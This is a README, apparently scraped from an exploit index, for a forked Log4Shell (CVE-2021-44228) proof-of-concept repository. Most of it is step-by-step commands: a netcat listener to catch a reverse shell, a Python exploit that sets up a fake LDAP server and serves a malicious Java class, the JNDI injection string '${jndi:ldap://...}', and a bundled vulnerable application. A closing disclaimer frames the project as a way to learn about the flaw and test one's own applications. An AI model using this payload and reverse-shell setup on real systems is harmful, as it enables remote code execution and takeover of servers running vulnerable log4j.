## https://sploitus.com/exploit?id=7DBFF6FA-15F2-5D96-A930-7F95ACAE62E7
# log4j-shell-poc
A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability, forked from [kozmer](https://github.com/kozmer/log4j-shell-poc).
Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others.
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.
Proof-of-concept (POC)
----------------------
#### Clone:
```bash
git clone https://github.com/TTN-ATTN/log4j-shell-poc.git
cd log4j-shell-poc/
```
#### Install requirements:
```bash
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
#### Usage:
* In the first terminal, start a netcat listener to accept reverse shell connection.
```bash
nc -lvnp 9001
```
* In the second terminal, launch the exploit.
```bash
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/TTN-ATTN/log4j-shell-poc.git
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
```
**Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20` and be in the same directory. This can be downloaded from [jdk-8u20-linux-x64.tar.gz](https://download.oracle.com/otn/java/jdk/8u20-b26/jdk-8u20-linux-x64.tar.gz).
* In the third terminal, launch the vulnerable application
```bash
chmod +x run.sh
./run.sh
```
Getting the Java version.
--------------------------------------
Oracle thankfully provides an archive for all previous java versions:
[https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).
Scroll down to `8u20` and download the appropriate files for your operating system and hardware.

**Note:** You do need to make an account to be able to download the package.
**Note:** Make sure to extract the jdk folder into this repository with the same name in order for it to work.
```
โฏ tar -xf jdk-8u20-linux-x64.tar.gz
โฏ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
```
Disclaimer
----------
This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: [https://log4shell.tools/](https://log4shell.tools/)).
---
### Credits
Original POC by [kozmer](https://github.com/kozmer/log4j-shell-poc).